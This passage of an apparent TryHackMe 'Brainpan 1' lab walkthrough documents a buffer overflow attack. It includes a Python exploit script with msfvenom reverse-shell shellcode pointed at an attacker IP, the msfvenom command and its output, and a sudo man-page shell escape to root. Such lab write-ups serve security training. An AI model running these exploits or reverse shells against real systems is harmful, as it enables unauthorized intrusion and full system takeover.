b"\x79\x7f\xe5\x09\x10\x7a\x6e\x3c\xed\x78\x5b\x28\xef\x80"
b"\xba\xc9\x66\x66\xa8\x19\x2f\x31\x45\x83\x6a\xc9\xf4\x4c"
b"\xa1\xb4\x37\xc6\x46\x49\xf9\x2f\x22\x59\x6e\xc0\x79\x03"
b"\x39\xdf\x57\x2b\xa5\x72\x3c\xab\xa0\x6e\xeb\xfc\xe5\x41"
b"\xe2\x68\x18\xfb\x5c\x8e\xe1\x9d\xa7\x0a\x3e\x5e\x29\x93"
b"\xb3\xda\x0d\x83\x0d\xe2\x09\xf7\xc1\xb5\xc7\xa1\xa7\x6f"
b"\xa6\x1b\x7e\xc3\x60\xcb\x07\x2f\xb3\x8d\x07\x7a\x45\x71"
b"\xb9\xd3\x10\x8e\x76\xb4\x94\xf7\x6a\x24\x5a\x22\x2f\x54"
b"\x11\x6e\x06\xfd\xfc\xfb\x1a\x60\xff\xd6\x59\x9d\x7c\xd2"
b"\x21\x5a\x9c\x97\x24\x26\x1a\x44\x55\x37\xcf\x6a\xca\x38"
b"\xda")

print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.220.161',9999))
s.send(payload)
s.close()

Set up a listener for catching reverse shell on port 7777

We gained a shell but it is a hybrid environment where we couldn’t get a full access to linux

Terminate and Restart machine

Generate a Linux payload

┌──(kali㉿kali)-[~/LPE/brainpan]
└─$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.8.252.53 LPORT=5555 -b "\x00" -f c   
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] = 
"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";

Edit exploit.py

import sys, socket

buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32

payload2 = (b"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
b"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
b"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
b"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
b"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
b"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
b"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";


print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.x.x',9999))
s.send(payload)
s.close()

Set up a listener on port 5555

Spawn TTY shell

Escalating Privileges

After spawning a TTY Shell

puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:/home/puck$ /home/anansi/bin/anansi_util network
/home/anansi/bin/anansi_util network
bash: /home/anansi/bin/anansi_util: Permission denied
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
    link/ether 02:46:b1:a1:5f:0b brd ff:ff:ff:ff:ff:ff
    inet 10.10.80.44/16 brd 10.10.255.255 scope global eth0
    inet6 fe80::46:b1ff:fea1:5f0b/64 scope link 
       valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
sudo /home/anansi/bin/anansi_util proclist
'unknown': unknown terminal type.
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man#

We can write commands

shell escape sequences

vim

Upgrading the shell

AFter TTY shell
ctrl z

stty raw -echo
fg
fg

It should go back to the shell

Brainpan 1

TryHackMe | Brainpan 1

Walkthrough

Gaining a Foothold

Mona Configuration

Escalating Privileges

Video